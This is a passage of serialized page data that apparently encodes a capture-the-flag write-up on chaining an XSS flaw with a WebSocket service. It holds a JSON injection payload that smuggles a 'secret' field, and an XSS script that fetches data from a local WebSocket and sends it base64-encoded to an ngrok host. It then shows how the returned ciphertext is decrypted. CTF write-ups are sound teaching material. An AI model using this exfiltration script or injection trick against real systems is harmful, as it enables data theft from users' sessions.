n":51654},{"style":140},[51655],{"type":38,"value":776},{"type":33,"tag":128,"props":51657,"children":51658},{"style":1576},[51659],{"type":38,"value":5730},{"type":33,"tag":128,"props":51661,"children":51662},{"style":140},[51663],{"type":38,"value":49478},{"type":33,"tag":128,"props":51665,"children":51666},{"style":1576},[51667],{"type":38,"value":5720},{"type":33,"tag":128,"props":51669,"children":51670},{"style":140},[51671],{"type":38,"value":2815},{"type":33,"tag":128,"props":51673,"children":51674},{"style":312},[51675],{"type":38,"value":215},{"type":33,"tag":128,"props":51677,"children":51678},{"style":140},[51679],{"type":38,"value":12236},{"type":33,"tag":128,"props":51681,"children":51682},{"style":1576},[51683],{"type":38,"value":5730},{"type":33,"tag":128,"props":51685,"children":51686},{"style":140},[51687],{"type":38,"value":51688},"\u003CSTOP_HERE>\",\"secret\":\"",{"type":33,"tag":128,"props":51690,"children":51691},{"style":1576},[51692],{"type":38,"value":5720},{"type":33,"tag":128,"props":51694,"children":51695},{"style":140},[51696],{"type":38,"value":46812},{"type":33,"tag":128,"props":51698,"children":51699},{"style":1576},[51700],{"type":38,"value":5730},{"type":33,"tag":128,"props":51702,"children":51703},{"style":140},[51704],{"type":38,"value":49520},{"type":33,"tag":128,"props":51706,"children":51707},{"style":676},[51708],{"type":38,"value":5739},{"type":33,"tag":128,"props":51710,"children":51711},{"style":312},[51712],{"type":38,"value":5815},{"type":33,"tag":114,"props":51714,"children":51715},{"lang":116},[51716],{"type":33,"tag":119,"props":51717,"children":51719},{"code":51718,"language":116,"meta":8,"className":121,"style":8},"python -c \"print('A'*181)\" | pbcopy\n",[51720],{"type":33,"tag":105,"props":51721,"children":51722},{"__ignoreMap":8},[51723],{"type":33,"tag":128,"props":51724,"children":51725},{"class":130,"line":131},[51726,51730,51734,51738,51743,51747,51751],{"type":33,"tag":128,"props":51727,"children":51728},{"style":135},[51729],{"type":38,"value":10227},{"type":33,"tag":128,"props":51731,"children":51732},{"style":151},[51733],{"type":38,"value":8707},{"type":33,"tag":128,"props":51735,"children":51736},{"style":676},[51737],{"type":38,"value":679},{"type":33,"tag":128,"props":51739,"children":51740},{"style":140},[51741],{"type":38,"value":51742},"print('A'*181)",{"type":33,"tag":128,"props":51744,"children":51745},{"style":676},[51746],{"type":38,"value":669},{"type":33,"tag":128,"props":51748,"children":51749},{"style":300},[51750],{"type":38,"value":10195},{"type":33,"tag":128,"props":51752,"children":51753},{"style":135},[51754],{"type":38,"value":51755}," pbcopy\n",{"type":33,"tag":47,"props":51757,"children":51758},{},[51759],{"type":38,"value":51760},"So we have our payload:",{"type":33,"tag":114,"props":51762,"children":51763},{"lang":633},[51764],{"type":33,"tag":119,"props":51765,"children":51767},{"code":51766,"language":633,"meta":8,"className":637,"style":8},"{\n \"action\": \"add\",\n \"title\":\"a\",\n \"description\": \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\",\\\"secret\\\":\\\"f3eeaa82370f7e9bfbc2caf16f6d19b7\"\n}\n",[51768],{"type":33,"tag":105,"props":51769,"children":51770},{"__ignoreMap":8},[51771,51778,51813,51848,51913],{"type":33,"tag":128,"props":51772,"children":51773},{"class":130,"line":131},[51774],{"type":33,"tag":128,"props":51775,"children":51776},{"style":312},[51777],{"type":38,"value":650},{"type":33,"tag":128,"props":51779,"children":51780},{"class":130,"line":362},[51781,51785,51789,51793,51797,51801,51805,51809],{"type":33,"tag":128,"props":51782,"children":51783},{"style":656},[51784],{"type":38,"value":659},{"type":33,"tag":128,"props":51786,"children":51787},{"style":437},[51788],{"type":38,"value":12513},{"type":33,"tag":128,"props":51790,"children":51791},{"style":656},[51792],{"type":38,"value":669},{"type":33,"tag":128,"props":51794,"children":51795},{"style":312},[51796],{"type":38,"value":284},{"type":33,"tag":128,"props":51798,"children":51799},{"style":676},[51800],{"type":38,"value":679},{"type":33,"tag":128,"props":51802,"children":51803},{"style":140},[51804],{"type":38,"value":49388},{"type":33,"tag":128,"props":51806,"children":51807},{"style":676},[51808],{"type":38,"value":669},{"type":33,"tag":128,"props":51810,"children":51811},{"style":312},[51812],{"type":38,"value":693},{"type":33,"tag":128,"props":51814,"children":51815},{"class":130,"line":403},[51816,51820,51824,51828,51832,51836,51840,51844],{"type":33,"tag":128,"props":51817,"children":51818},{"style":656},[51819],{"type":38,"value":659},{"type":33,"tag":128,"props":51821,"children":51822},{"style":437},[51823],{"type":38,"value":776},{"type":33,"tag":128,"props":51825,"children":51826},{"style":656},[51827],{"type":38,"value":669},{"type":33,"tag":128,"props":51829,"children":51830},{"style":312},[51831],{"type":38,"value":284},{"type":33,"tag":128,"props":51833,"children":51834},{"style":676},[51835],{"type":38,"value":669},{"type":33,"tag":128,"props":51837,"children":51838},{"style":140},[51839],{"type":38,"value":53},{"type":33,"tag":128,"props":51841,"children":51842},{"style":676},[51843],{"type":38,"value":669},{"type":33,"tag":128,"props":51845,"children":51846},{"style":312},[51847],{"type":38,"value":693},{"type":33,"tag":128,"props":51849,"children":51850},{"class":130,"line":739},[51851,51855,51859,51863,51867,51871,51876,51880,51884,51888,51892,51896,51900,51904,51909],{"type":33,"tag":128,"props":51852,"children":51853},{"style":656},[51854],{"type":38,"value":659},{"type":33,"tag":128,"props":51856,"children":51857},{"style":437},[51858],{"type":38,"value":12236},{"type":33,"tag":128,"props":51860,"children":51861},{"style":656},[51862],{"type":38,"value":669},{"type":33,"tag":128,"props":51864,"children":51865},{"style":312},[51866],{"type":38,"value":284},{"type":33,"tag":128,"props":51868,"children":51869},{"style":676},[51870],{"type":38,"value":679},{"type":33,"tag":128,"props":51872,"children":51873},{"style":140},[51874],{"type":38,"value":51875},"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",{"type":33,"tag":128,"props":51877,"children":51878},{"style":151},[51879],{"type":38,"value":10544},{"type":33,"tag":128,"props":51881,"children":51882},{"style":140},[51883],{"type":38,"value":5584},{"type":33,"tag":128,"props":51885,"children":51886},{"style":151},[51887],{"type":38,"value":10544},{"type":33,"tag":128,"props":51889,"children":51890},{"style":140},[51891],{"type":38,"value":46812},{"type":33,"tag":128,"props":51893,"children":51894},{"style":151},[51895],{"type":38,"value":10544},{"type":33,"tag":128,"props":51897,"children":51898},{"style":140},[51899],{"type":38,"value":284},{"type":33,"tag":128,"props":51901,"children":51902},{"style":151},[51903],{"type":38,"value":10544},{"type":33,"tag":128,"props":51905,"children":51906},{"style":140},[51907],{"type":38,"value":51908},"f3eeaa82370f7e9bfbc2caf16f6d19b7",{"type":33,"tag":128,"props":51910,"children":51911},{"style":676},[51912],{"type":38,"value":836},{"type":33,"tag":128,"props":51914,"children":51915},{"class":130,"line":765},[51916],{"type":33,"tag":128,"props":51917,"children":51918},{"style":312},[51919],{"type":38,"value":854},{"type":33,"tag":40,"props":51921,"children":51922},{"id":21053},[51923],{"type":38,"value":21056},{"type":33,"tag":47,"props":51925,"children":51926},{},[51927,51929,51934,51936,51941],{"type":38,"value":51928},"We need to generate a script to be triggered by the ",{"type":33,"tag":105,"props":51930,"children":51932},{"className":51931},[],[51933],{"type":38,"value":47399},{"type":38,"value":51935}," script with the xss vuln on the first service.\nWe also need to setup an ",{"type":33,"tag":53,"props":51937,"children":51939},{"href":43936,"rel":51938},[57],[51940],{"type":38,"value":43940},{"type":38,"value":51942}," with ngrok to get command output.",{"type":33,"tag":114,"props":51944,"children":51945},{"lang":5526},[51946],{"type":33,"tag":119,"props":51947,"children":51949},{"code":51948,"language":5526,"meta":8,"className":5530,"style":8},"\u003Cscript>\nconst s = async () => {\n const w = new WebSocket(`ws://127.0.0.1/ws`);\n w.onopen = async () => {\n w.send(JSON.stringify({action:'add',title:\"a\",description: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\"secret\":\"f3eeaa82370f7e9bfbc2caf16f6d19b7\"}'}));\n setTimeout(() => {w.send(JSON.stringify({action:'get'}));}, 1000);\n };\n w.onmessage = async (msg) => {\n fetch(`http://0c5f-91-69-133-214.ngrok.io/exploit/${btoa(msg.data)}`, {mode: 'no-cors'});\n };\n};\ns();\n\u003C/script>\n",[51950],{"type":33,"tag":105,"props":51951,"children":51952},{"__ignoreMap":8},[51953,51968,51980,52030,52067,52177,52263,52274,52318,52410,52421,52432,52440],{"type":33,"tag":128,"props":51954,"children":51955},{"class":130,"line":131},[51956,51960,51964],{"type":33,"tag":128,"props":51957,"children":51958},{"style":312},[51959],{"type":38,"value":5977},{"type":33,"tag":128,"props":51961,"children":51962},{"style":1576},[51963],{"type":38,"value":15064},{"type":33,"tag":128,"props":51965,"children":51966},{"style":312},[51967],{"type":38,"value":6097},{"type":33,"tag":128,"props":51969,"children":51970},{"class":130,"line":362},[51971,51976],{"type":33,"tag":128,"props":51972,"children":51973},{"style":323},[51974],{"type":38,"value":51975},"const s = async () => ",{"type":33,"tag":128,"props":51977,"children":51978},{"style":312},[51979],{"type":38,"value":650},{"type":33,"tag":128,"props":51981,"children":51982},{"class":130,"line":403},[51983,51987,51992,51996,52000,52005,52009,52013,52018,52022,52026],{"type":33,"tag":128,"props":51984,"children":51985},{"style":306},[51986],{"type":38,"value":5637},{"type":33,"tag":128,"props":51988,"children":51989},{"style":306},[51990],{"type":38,"value":51991}," w",{"type":33,"tag":128,"props":51993,"children":51994},{"style":312},[51995],{"type":38,"value":5657},{"type":33,"tag":128,"props":51997,"children":51998},{"style":300},[51999],{"type":38,"value":13061},{"type":33,"tag":128,"props":52001,"children":52002},{"style":135},[52003],{"type":38,"value":52004}," WebSocket",{"type":33,"tag":128,"props":52006,"children":52007},{"style":312},[52008],{"type":38,"value":5566},{"type":33,"tag":128,"props":52010,"children":52011},{"style":676},[52012],{"type":38,"value":5739},{"type":33,"tag":128,"props":52014,"children":52015},{"style":140},[52016],{"type":38,"value":52017},"ws://127.0.0.1/ws",{"type":33,"tag":128,"props":52019,"children":52020},{"style":676},[52021],{"type":38,"value":5739},{"type":33,"tag":128,"props":52023,"children":52024},{"style":312},[52025],{"type":38,"value":2966},{"type":33,"tag":128,"props":52027,"children":52028},{"style":323},[52029],{"type":38,"value":5676},{"type":33,"tag":128,"props":52031,"children":52032},{"class":130,"line":739},[52033,52038,52042,52047,52051,52055,52059,52063],{"type":33,"tag":128,"props":52034,"children":52035},{"style":306},[52036],{"type":38,"value":52037}," w",{"type":33,"tag":128,"props":52039,"children":52040},{"style":312},[52041],{"type":38,"value":215},{"type":33,"tag":128,"props":52043,"children":52044},{"style":135},[52045],{"type":38,"value":52046},"onopen",{"type":33,"tag":128,"props":52048,"children":52049},{"style":312},[52050],{"type":38,"value":5657},{"type":33,"tag":128,"props":52052,"children":52053},{"style":300},[52054],{"type":38,"value":5598},{"type":33,"tag":128,"props":52056,"children":52057},{"style":312},[52058],{"type":38,"value":13259},{"type":33,"tag":128,"props":52060,"children":52061},{"style":312},[52062],{"type":38,"value":5625},{"type":33,"tag":128,"props":52064,"children":52065},{"style":312},[52066],{"type":38,"value":762},{"type":33,"tag":128,"props":52068,"children":52069},{"class":130,"line":765},[52070,52075,52079,52083,52087,52091,52095,52099,52103,52107,52111,52115,52119,52123,52127,52131,52135,52139,52143,52147,52151,52155,52159,52163,52168,52172],{"type":33,"tag":128,"props":52071,"children":52072},{"style":306},[52073],{"type":38,"value":52074}," w",{"type":33,"tag":128,"props":52076,"children":52077},{"style":312},[52078],{"type":38,"value":215},{"type":33,"tag":128,"props":52080,"children":52081},{"style":135},[52082],{"type":38,"value":23433},{"type":33,"tag":128,"props":52084,"children":52085},{"style":312},[52086],{"type":38,"value":5566},{"type":33,"tag":128,"props":52088,"children":52089},{"style":306},[52090],{"type":38,"value":6301},{"type":33,"tag":128,"props":52092,"children":52093},{"style":312},[52094],{"type":38,"value":215},{"type":33,"tag":128,"props":52096,"children":52097},{"style":135},[52098],{"type":38,"value":49561},{"type":33,"tag":128,"props":52100,"children":52101},{"style":312},[52102],{"type":38,"value":5836},{"type":33,"tag":128,"props":52104,"children":52105},{"style":437},[52106],{"type":38,"value":12513},{"type":33,"tag":128,"props":52108,"children":52109},{"style":312},[52110],{"type":38,"value":284},{"type":33,"tag":128,"props":52112,"children":52113},{"style":676},[52114],{"type":38,"value":6040},{"type":33,"tag":128,"props":52116,"children":52117},{"style":140},[52118],{"type":38,"value":49388},{"type":33,"tag":128,"props":52120,"children":52121},{"style":676},[52122],{"type":38,"value":6040},{"type":33,"tag":128,"props":52124,"children":52125},{"style":312},[52126],{"type":38,"value":5584},{"type":33,"tag":128,"props":52128,"children":52129},{"style":437},[52130],{"type":38,"value":776},{"type":33,"tag":128,"props":52132,"children":52133},{"style":312},[52134],{"type":38,"value":284},{"type":33,"tag":128,"props":52136,"children":52137},{"style":676},[52138],{"type":38,"value":669},{"type":33,"tag":128,"props":52140,"children":52141},{"style":140},[52142],{"type":38,"value":53},{"type":33,"tag":128,"props":52144,"children":52145},{"style":676},[52146],{"type":38,"value":669},{"type":33,"tag":128,"props":52148,"children":52149},{"style":312},[52150],{"type":38,"value":5584},{"type":33,"tag":128,"props":52152,"children":52153},{"style":437},[52154],{"type":38,"value":12236},{"type":33,"tag":128,"props":52156,"children":52157},{"style":312},[52158],{"type":38,"value":284},{"type":33,"tag":128,"props":52160,"children":52161},{"style":676},[52162],{"type":38,"value":6739},{"type":33,"tag":128,"props":52164,"children":52165},{"style":140},[52166],{"type":38,"value":52167},"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\"secret\":\"f3eeaa82370f7e9bfbc2caf16f6d19b7\"}",{"type":33,"tag":128,"props":52169,"children":52170},{"style":676},[52171],{"type":38,"value":6040},{"type":33,"tag":128,"props":52173,"children":52174},{"style":312},[52175],{"type":38,"value":52176},"}));\n",{"type":33,"tag":128,"props":52178,"children":52179},{"class":130,"line":804},[52180,52185,52189,52193,52197,52202,52206,52210,52214,52218,52222,52226,52230,52234,52238,52242,52246,52250,52255,52259],{"type":33,"tag":128,"props":52181,"children":52182},{"style":135},[52183],{"type":38,"value":52184}," setTimeout",{"type":33,"tag":128,"props":52186,"children":52187},{"style":312},[52188],{"type":38,"value":8135},{"type":33,"tag":128,"props":52190,"children":52191},{"style":312},[52192],{"type":38,"value":5625},{"type":33,"tag":128,"props":52194,"children":52195},{"style":312},[52196],{"type":38,"value":5642},{"type":33,"tag":128,"props":52198,"children":52199},{"style":306},[52200],{"type":38,"value":52201},"w",{"type":33,"tag":128,"props":52203,"children":52204},{"style":312},[52205],{"type":38,"value":215},{"type":33,"tag":128,"props":52207,"children":52208},{"style":135},[52209],{"type":38,"value":23433},{"type":33,"tag":128,"props":52211,"children":52212},{"style":312},[52213],{"type":38,"value":5566},{"type":33,"tag":128,"props":52215,"children":52216},{"style":306},[52217],{"type":38,"value":6301},{"type":33,"tag":128,"props":52219,"children":52220},{"style":312},[52221],{"type":38,"value":215},{"type":33,"tag":128,"props":52223,"children":52224},{"style":135},[52225],{"type":38,"value":49561},{"type":33,"tag":128,"props":52227,"children":52228},{"style":312},[52229],{"type":38,"value":5836},{"type":33,"tag":128,"props":52231,"children":52232},{"style":437},[52233],{"type":38,"value":12513},{"type":33,"tag":128,"props":52235,"children":52236},{"style":312},[52237],{"type":38,"value":284},{"type":33,"tag":128,"props":52239,"children":52240},{"style":676},[52241],{"type":38,"value":6040},{"type":33,"tag":128,"props":52243,"children":52244},{"style":140},[52245],{"type":38,"value":13526},{"type":33,"tag":128,"props":52247,"children":52248},{"style":676},[52249],{"type":38,"value":6040},{"type":33,"tag":128,"props":52251,"children":52252},{"style":312},[52253],{"type":38,"value":52254},"}));},",{"type":33,"tag":128,"props":52256,"children":52257},{"style":523},[52258],{"type":38,"value":8408},{"type":33,"tag":128,"props":52260,"children":52261},{"style":312},[52262],{"type":38,"value":5815},{"type":33,"tag":128,"props":52264,"children":52265},{"class":130,"line":839},[52266,52270],{"type":33,"tag":128,"props":52267,"children":52268},{"style":312},[52269],{"type":38,"value":6850},{"type":33,"tag":128,"props":52271,"children":52272},{"style":323},[52273],{"type":38,"value":5676},{"type":33,"tag":128,"props":52275,"children":52276},{"class":130,"line":848},[52277,52281,52285,52290,52294,52298,52302,52306,52310,52314],{"type":33,"tag":128,"props":52278,"children":52279},{"style":306},[52280],{"type":38,"value":52037},{"type":33,"tag":128,"props":52282,"children":52283},{"style":312},[52284],{"type":38,"value":215},{"type":33,"tag":128,"props":52286,"children":52287},{"style":135},[52288],{"type":38,"value":52289},"onmessage",{"type":33,"tag":128,"props":52291,"children":52292},{"style":312},[52293],{"type":38,"value":5657},{"type":33,"tag":128,"props":52295,"children":52296},{"style":300},[52297],{"type":38,"value":5598},{"type":33,"tag":128,"props":52299,"children":52300},{"style":312},[52301],{"type":38,"value":2852},{"type":33,"tag":128,"props":52303,"children":52304},{"style":306},[52305],{"type":38,"value":49235},{"type":33,"tag":128,"props":52307,"children":52308},{"style":312},[52309],{"type":38,"value":2966},{"type":33,"tag":128,"props":52311,"children":52312},{"style":312},[52313],{"type":38,"value":5625},{"type":33,"tag":128,"props":52315,"children":52316},{"style":312},[52317],{"type":38,"value":762},{"type":33,"tag":128,"props":52319,"children":52320},{"class":130,"line":976},[52321,52326,52330,52334,52339,52343,52348,52352,52356,52360,52364,52368,52372,52376,52380,52384,52389,52393,52397,52402,52406],{"type":33,"tag":128,"props":52322,"children":52323},{"style":135},[52324],{"type":38,"value":52325}," fetch",{"type":33,"tag":128,"props":52327,"children":52328},{"style":312},[52329],{"type":38,"value":5566},{"type":33,"tag":128,"props":52331,"children":52332},{"style":676},[52333],{"type":38,"value":5739},{"type":33,"tag":128,"props":52335,"children":52336},{"style":140},[52337],{"type":38,"value":52338},"http://0c5f-91-69-133-214.ngrok.io/exploit/",{"type":33,"tag":128,"props":52340,"children":52341},{"style":1576},[52342],{"type":38,"value":5720},{"type":33,"tag":128,"props":52344,"children":52345},{"style":135},[52346],{"type":38,"value":52347},"btoa",{"type":33,"tag":128,"props":52349,"children":52350},{"style":312},[52351],{"type":38,"value":5566},{"type":33,"tag":128,"props":52353,"children":52354},{"style":140},[52355],{"type":38,"value":49235},{"type":33,"tag":128,"props":52357,"children":52358},{"style":312},[52359],{"type":38,"value":215},{"type":33,"tag":128,"props":52361,"children":52362},{"style":140},[52363],{"type":38,"value":2815},{"type":33,"tag":128,"props":52365,"children":52366},{"style":312},[52367],{"type":38,"value":2966},{"type":33,"tag":128,"props":52369,"children":52370},{"style":1576},[52371],{"type":38,"value":5730},{"type":33,"tag":128,"props":52373,"children":52374},{"style":676},[52375],{"type":38,"value":5739},{"type":33,"tag":128,"props":52377,"children":52378},{"style":312},[52379],{"type":38,"value":5584},{"type":33,"tag":128,"props":52381,"children":52382},{"style":312},[52383],{"type":38,"value":5642},{"type":33,"tag":128,"props":52385,"children":52386},{"style":437},[52387],{"type":38,"value":52388},"mode",{"type":33,"tag":128,"props":52390,"children":52391},{"style":312},[52392],{"type":38,"value":284},{"type":33,"tag":128,"props":52394,"children":52395},{"style":676},[52396],{"type":38,"value":6739},{"type":33,"tag":128,"props":52398,"children":52399},{"style":140},[52400],{"type":38,"value":52401},"no-cors",{"type":33,"tag":128,"props":52403,"children":52404},{"style":676},[52405],{"type":38,"value":6040},{"type":33,"tag":128,"props":52407,"children":52408},{"style":312},[52409],{"type":38,"value":5902},{"type":33,"tag":128,"props":52411,"children":52412},{"class":130,"line":988},[52413,52417],{"type":33,"tag":128,"props":52414,"children":52415},{"style":312},[52416],{"type":38,"value":6850},{"type":33,"tag":128,"props":52418,"children":52419},{"style":323},[52420],{"type":38,"value":5676},{"type":33,"tag":128,"props":52422,"children":52423},{"class":130,"line":1001},[52424,52428],{"type":33,"tag":128,"props":52425,"children":52426},{"style":312},[52427],{"type":38,"value":5730},{"type":33,"tag":128,"props":52429,"children":52430},{"style":323},[52431],{"type":38,"value":5676},{"type":33,"tag":128,"props":52433,"children":52434},{"class":130,"line":1014},[52435],{"type":33,"tag":128,"props":52436,"children":52437},{"style":323},[52438],{"type":38,"value":52439},"s();\n",{"type":33,"tag":128,"props":52441,"children":52442},{"class":130,"line":1026},[52443,52447,52451],{"type":33,"tag":128,"props":52444,"children":52445},{"style":312},[52446],{"type":38,"value":6190},{"type":33,"tag":128,"props":52448,"children":52449},{"style":1576},[52450],{"type":38,"value":15064},{"type":33,"tag":128,"props":52452,"children":52453},{"style":312},[52454],{"type":38,"value":6097},{"type":33,"tag":47,"props":52456,"children":52457},{},[52458],{"type":38,"value":52459},"With this we have this response:",{"type":33,"tag":114,"props":52461,"children":52462},{"lang":633},[52463],{"type":33,"tag":119,"props":52464,"children":52466},{"code":52465,"language":633,"meta":8,"className":637,"style":8},"{\n \"quote\":\n {\n \"iv\": \"f35ddb2c2292f575d2b9fc505da10997\",\n \"content\":\"87dcac119f4c45a9c534c3b54191fb98c854ba0f81f3ecfe08c90fd1058dcd8772982756fb21f4ccebd6f46723a77555ad81cb66b2689bb096e1825f3919ee\"\n }\n}\n",[52467],{"type":33,"tag":105,"props":52468,"children":52469},{"__ignoreMap":8},[52470,52477,52496,52503,52540,52572,52579],{"type":33,"tag":128,"props":52471,"children":52472},{"class":130,"line":131},[52473],{"type":33,"tag":128,"props":52474,"children":52475},{"style":312},[52476],{"type":38,"value":650},{"type":33,"tag":128,"props":52478,"children":52479},{"class":130,"line":362},[52480,52484,52488,52492],{"type":33,"tag":128,"props":52481,"children":52482},{"style":656},[52483],{"type":38,"value":659},{"type":33,"tag":128,"props":52485,"children":52486},{"style":437},[52487],{"type":38,"value":50333},{"type":33,"tag":128,"props":52489,"children":52490},{"style":656},[52491],{"type":38,"value":669},{"type":33,"tag":128,"props":52493,"children":52494},{"style":312},[52495],{"type":38,"value":5318},{"type":33,"tag":128,"props":52497,"children":52498},{"class":130,"line":403},[52499],{"type":33,"tag":128,"props":52500,"children":52501},{"style":312},[52502],{"type":38,"value":12699},{"type":33,"tag":128,"props":52504,"children":52505},{"class":130,"line":739},[52506,52510,52515,52519,52523,52527,52532,52536],{"type":33,"tag":128,"props":52507,"children":52508},{"style":656},[52509],{"type":38,"value":12707},{"type":33,"tag":128,"props":52511,"children":52512},{"style":437},[52513],{"type":38,"value":52514},"iv",{"type":33,"tag":128,"props":52516,"children":52517},{"style":656},[52518],{"type":38,"value":669},{"type":33,"tag":128,"props":52520,"children":52521},{"style":312},[52522],{"type":38,"value":284},{"type":33,"tag":128,"props":52524,"children":52525},{"style":676},[52526],{"type":38,"value":679},{"type":33,"tag":128,"props":52528,"children":52529},{"style":140},[52530],{"type":38,"value":52531},"f35ddb2c2292f575d2b9fc505da10997",{"type":33,"tag":128,"props":52533,"children":52534},{"style":676},[52535],{"type":38,"value":669},{"type":33,"tag":128,"props":52537,"children":52538},{"style":312},[52539],{"type":38,"value":693},{"type":33,"tag":128,"props":52541,"children":52542},{"class":130,"line":765},[52543,52547,52551,52555,52559,52563,52568],{"type":33,"tag":128,"props":52544,"children":52545},{"style":656},[52546],{"type":38,"value":12707},{"type":33,"tag":128,"props":52548,"children":52549},{"style":437},[52550],{"type":38,"value":5242},{"type":33,"tag":128,"props":52552,"children":52553},{"style":656},[52554],{"type":38,"value":669},{"type":33,"tag":128,"props":52556,"children":52557},{"style":312},[52558],{"type":38,"value":284},{"type":33,"tag":128,"props":52560,"children":52561},{"style":676},[52562],{"type":38,"value":669},{"type":33,"tag":128,"props":52564,"children":52565},{"style":140},[52566],{"type":38,"value":52567},"87dcac119f4c45a9c534c3b54191fb98c854ba0f81f3ecfe08c90fd1058dcd8772982756fb21f4ccebd6f46723a77555ad81cb66b2689bb096e1825f3919ee",{"type":33,"tag":128,"props":52569,"children":52570},{"style":676},[52571],{"type":38,"value":836},{"type":33,"tag":128,"props":52573,"children":52574},{"class":130,"line":804},[52575],{"type":33,"tag":128,"props":52576,"children":52577},{"style":312},[52578],{"type":38,"value":6760},{"type":33,"tag":128,"props":52580,"children":52581},{"class":130,"line":839},[52582],{"type":33,"tag":128,"props":52583,"children":52584},{"style":312},[52585],{"type":38,"value":854},{"type":33,"tag":47,"props":52587,"children":52588},{},[52589,52591,52596],{"type":38,"value":52590},"We can decrypt because the ",{"type":33,"tag":105,"props":52592,"children":52594},{"className":52593},[],[52595],{"type":38,"value":46812},{"type":38,"value":52597}," come from us.",{"type":33,"tag":47,"props":52599,"children":52600},{},[52601,52603,52608],{"type":38,"value":52602},"So we can call ",{"type":33,"tag":105,"props":52604,"children":52606},{"className":52605},[],[52607],{"type":38,"value":46736},{"type":38,"value":52609}," with this payload:",{"type":33,"tag":114,"props":52611,"children":52612},{"lang":633},[52613],{"type":33,"tag":119,"props":52614,"children":52616},{"code":52615,"language":633,"meta":8,"className":637,"style":8},"{\n \"cipher\": {\n \"iv\": \"f35ddb2c2292f575d2b9fc505da10997\",\n \"content\": \"87dcac119f4c45a9c534c3b54191fb98c854ba0f81f3ecfe08c90fd1058dcd8772982756fb21f4ccebd6f46723a77555ad81cb66b2689bb096e1825f3919ee\"\n },\n \"secret\": \"f3eeaa82370f7e9bfbc2caf16f6d19b7\"\n}\n",[52617],{"type":33,"tag":105,"props":52618,"children":52619},{"__ignoreMap":8},[52620,52627,52650,52685,52716,52724,52755],{"type":33,"tag":128,"props":52621,"children":52622},{"class":130,"line":131},[52623],{"type":33,"tag":128,"props":52624,"children":52625},{"style":312},[52626],{"type":38,"value":650},{"type":33,"tag":128,"props":52628,"children":52629},{"class":130,"line":362},[52630,52634,52638,52642,52646],{"type":33,"tag":128,"props":52631,"children":52632},{"style":656},[52633],{"type":38,"value":771},{"type":33,"tag":128,"props":52635,"children":52636},{"style":437},[52637],{"type":38,"value":46934},{"type":33,"tag":128,"props":52639,"children":52640},{"style":656},[52641],{"type":38,"value":669},{"type":33,"tag":128,"props":52643,"children":52644},{"style":312},[52645],{"type":38,"value":284},{"type":33,"tag":128,"props":52647,"children":52648},{"style":312},[52649],{"type":38,"value":762},{"type":33,"tag":128,"props":52651,"children":52652},{"class":130,"line":403},[52653,52657,52661,52665,52669,52673,52677,52681],{"type":33,"tag":128,"props":52654,"children":52655},{"style":656},[52656],{"type":38,"value":12732},{"type":33,"tag":128,"props":52658,"children":52659},{"style":437},[52660],{"type":38,"value":52514},{"type":33,"tag":128,"props":52662,"children":52663},{"style":656},[52664],{"type":38,"value":669},{"type":33,"tag":128,"props":52666,"children":52667},{"style":312},[52668],{"type":38,"value":284},{"type":33,"tag":128,"props":52670,"children":52671},{"style":676},[52672],{"type":38,"value":679},{"type":33,"tag":128,"props":52674,"children":52675},{"style":140},[52676],{"type":38,"value":52531},{"type":33,"tag":128,"props":52678,"children":52679},{"style":676},[52680],{"type":38,"value":669},{"type":33,"tag":128,"props":52682,"children":52683},{"style":312},[52684],{"type":38,"value":693},{"type":33,"tag":128,"props":52686,"children":52687},{"class":130,"line":739},[52688,52692,52696,52700,52704,52708,52712],{"type":33,"tag":128,"props":52689,"children":52690},{"style":656},[52691],{"type":38,"value":12732},{"type":33,"tag":128,"props":52693,"children":52694},{"style":437},[52695],{"type":38,"value":5242},{"type":33,"tag":128,"props":52697,"children":52698},{"style":656},[52699],{"type":38,"value":669},{"type":33,"tag":128,"props":52701,"children":52702},{"style":312},[52703],{"type":38,"value":284},{"type":33,"tag":128,"props":52705,"children":52706},{"style":676},[52707],{"type":38,"value":679},{"type":33,"tag":128,"props":52709,"children":52710},{"style":140},[52711],{"type":38,"value":52567},{"type":33,"tag":128,"props":52713,"children":52714},{"style":676},[52715],{"type":38,"value":836},{"type":33,"tag":128,"props":52717,"children":52718},{"class":130,"line":765},[52719],{"type":33,"tag":128,"props":52720,"children":52721},{"style":312},[52722],{"type":38,"value":52723}," },\n",{"type":33,"tag":128,"props":52725,"children":52726},{"class":130,"line":804},[52727,52731,52735,52739,52743,52747,52751],{"type":33,"tag":128,"props":52728,"children":52729},{"style":656},[52730],{"type":38,"value":771},{"type":33,"tag":128,"props":52732,"children":52733},{"style":437},[52734],{"type":38,"value":46812},{"type":33,"tag":128,"props":52736,"children":52737},{"style":656},[52738],{"type":38,"value":669},{"type":33,"tag":128,"props":52740,"children":52741},{"style":312},[52742],{"type":38,"value":284},{"type":33,"tag":128,"props":52744,"children":52745},{"style":676},[52746],{"type":38,"value":679},{"type":33,"tag":128,"props":52748,"children":52749},{"style":140},[52750],{"type":38,"value":51908},{"type":33,"tag":128,"props":52752,"children":52753},{"style":676},[52754],{"type":38,"value":836},{"type":33,"tag":128,"props":52756,"children":52757},{"class":130,"line":839},[52758],{"type":33,"tag":128,"props":52759,"children":52760},{"style":312},[52761],{"type":38,"value":854},{"type":33,"tag":47,"props":52763,"children":52764},{},[52765],{"type":38,